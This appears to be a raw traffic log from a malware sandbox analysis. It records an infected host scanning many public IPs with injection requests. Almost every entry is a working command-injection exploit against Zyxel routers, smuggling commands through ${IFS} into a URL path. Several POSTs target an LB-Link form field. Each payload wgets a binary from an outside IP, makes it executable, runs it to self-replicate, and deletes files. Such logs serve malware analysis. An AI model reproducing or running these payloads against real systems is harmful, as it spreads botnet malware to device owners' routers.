                                                Jan 12, 2024 18:24:27.648175001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2471192.168.2.135993086.157.2.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648226023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2472192.168.2.1352714118.190.88.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648294926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2473192.168.2.134612623.132.196.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648359060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2474192.168.2.1339894108.92.20.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648435116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2475192.168.2.134890852.128.158.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648466110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2476192.168.2.135671663.154.131.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648555040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2477192.168.2.1338516150.222.211.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648591995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2478192.168.2.133562879.156.230.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648648977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2479192.168.2.134839052.1.150.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648699045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2480192.168.2.133786239.32.154.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648757935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2481192.168.2.135538082.104.67.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648812056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2482192.168.2.133508873.27.149.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648863077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2483192.168.2.1360472151.124.113.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648945093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2484192.168.2.1357760131.181.131.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648977041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2485192.168.2.134124877.142.235.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.649054050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2486192.168.2.134965645.250.34.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.649094105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2487192.168.2.1348288216.115.118.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.654145956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2488192.168.2.134399458.158.54.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.654186964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2489192.168.2.134657025.169.127.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.654329062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2490192.168.2.1351858204.142.71.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.654349089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2491192.168.2.135428418.149.151.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.654431105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2492192.168.2.1359296109.33.36.138080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.612267971 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:31.658298969 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:37.802277088 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:49.834255934 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2493192.168.2.134352813.108.194.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658232927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2494192.168.2.134053097.186.167.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658345938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2495192.168.2.134699274.187.12.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658380985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2496192.168.2.1346046210.145.182.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658416033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2497192.168.2.1360102170.118.206.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658449888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2498192.168.2.135266282.113.84.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658500910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2499192.168.2.134478488.36.229.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658534050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2500192.168.2.13558825.121.17.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658591032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2501192.168.2.1335538164.96.3.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658626080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2502192.168.2.1347308223.201.153.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658647060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2503192.168.2.1342992204.37.51.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658706903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2504192.168.2.1333260162.63.94.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658732891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2505192.168.2.1334766210.117.130.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658763885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2506192.168.2.1346644170.3.105.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658796072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2507192.168.2.1339782162.238.178.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658847094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2508192.168.2.1353730165.45.220.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658883095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2509192.168.2.134833089.208.218.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658925056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2510192.168.2.1338502186.143.176.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658951044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2511192.168.2.1346552133.151.242.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.658986092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2512192.168.2.1344758112.111.141.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659027100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2513192.168.2.1339000181.15.207.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659077883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2514192.168.2.135925264.149.77.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659101963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2515192.168.2.1348354223.196.180.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659121990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2516192.168.2.1345256115.22.224.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659187078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2517192.168.2.133912661.247.154.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659204960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2518192.168.2.134756098.76.128.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659252882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2519192.168.2.1358432183.253.188.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659291983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2520192.168.2.1348356117.242.60.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659332037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2521192.168.2.1347254195.139.203.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659368992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2522192.168.2.1346070178.240.48.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659415007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2523192.168.2.1338692170.119.34.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659462929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2524192.168.2.1359148160.43.136.218443
                                                TimestampBytes transferredDirectionData
